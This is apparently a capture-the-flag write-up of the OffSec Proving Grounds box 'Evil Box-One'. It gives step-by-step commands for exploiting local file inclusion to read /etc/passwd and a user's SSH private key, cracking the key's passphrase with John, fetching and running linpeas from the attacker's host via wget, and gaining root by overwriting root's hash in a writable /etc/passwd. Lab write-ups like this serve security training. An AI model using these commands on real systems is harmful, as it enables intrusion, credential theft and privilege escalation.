Today, we tackle Offsec’s Proving Grounds and we’re locked and loaded on Evil Box-One.
The following box is vulnerable to Local File Inclusion which is a type of vulnerability that occurs when an application allows user input to influence file paths used in file inclusion operations, without properly sanitizing the input. This can allow an attacker to include files located elsewhere on the server that were not intended to be accessible through the web application. Soon after we exploit the machine via LFI, we gain privileges due to a misconfiguration in the permissions set for /etc/passwd.
Let’s begin!
I started recon with a script I made named ily.sh. Merry Valentine’s Day I guess. This baby does three things for me after passing an argument and surprisingly stays loyal:
./ily.sh TARGET-IP- Starting AutoRecon — An amazing tool used to automate your recon, I highly recommend it.
- Spawns a Python server on port 80 — I do this to view AutoRecon’s results more efficiently. It’s important to spawn this in the same directory used to run AutoRecon.
- Runs FFuF — A fast fuzzing tool I’m using to search for hidden directories.
Got a few hits on some directories and this one had a message for us in /robots.txt ha. ok.
In another directory named /secret we find some numbers?
This is all I was able to collect with my initial scan until I decided to search for hidden directories again. However, this time I added /secrets to the end of the address in my scan and found /evil.php
This led me down a rabbit hole because I thought I had to assemble four more directories to spawn the Exodia of URLs for a foothold.
The actual way in starts with us making a query to the back end using FFuF and a word list, which confirms our LFI vulnerability.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://IP/secret/evil.php?FUZZ=/etc/passwd
This gave us an output of “command”, so when we plug that in the space we “FUZZ” for, we receive this gorgeous /etc/passwd page. Within this, you’ll find the username ;)
TARGET-IP/secret/evil.php?command=/etc/passwdAfter further enumeration seeing as we can view other files we eventually find some private SSH keys down below
http://IP/secret/evil.php?command=/home/mowree/.ssh/id_rsa
I copied this entire private key and did a few things:
- Opened an editor and pasted this key into a new file named “id_rsa”
- I used ssh2John to transform the key and renamed it to id_rsa.john.
/usr/share/john/ssh2john.py id_rsa id_rsa >id_rsa.john3. Ran the newly created file against the rockyou.txt wordlist and cracked the password.
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.johnNow we SSH into our user account.
We’re going to use the private key in tandem with the password we received. This is different from password authentication because in our case, when connecting to the server we authenticate by having possession of the private key without transmitting it and the passphrase for the key. We use:
ssh -i id_rsa USER@TARGET-IP“ssh”: Starts the ssh service
“-i id_rsa”: -i specifies the file containing the private key used for key based authentication. id_rsa is the name of the file the key is stored in.
“USER”: Specifies the username intended to log into the remote server.
“TARGET-IP”: Is the IP address of the remote server.
WE GOT USER!!! LET’S GO.
Now that we’re in I did the following:
- I changed directories to /tmp.
- Started a server in the same directory my linpeas is in.
python3 -m http.server 803. Then I pushed it over to the target machine.
#in the /tmp directory of the target machine
wget YOUR-IP/linpeas.sh4. Gave executable permissions to linpeas on the target machine.
chmod +x linpeas.shFinally, we run it!
./linpeas.shI can write to the /etc/passwd file after viewing the output.
My objective here is to edit the “x” next to “root:” with a new custom hashed password, save and then close it.
To generate a new hashed password, and then edit the output into the placeholder we mentioned above, I used:
openssl passwd sekkio123
nano /etc/passwdAfter that we use:
su rootIt’ll prompt you for the password you hashed in plain text using OpenSSL and…
WE GOT ROOT!!
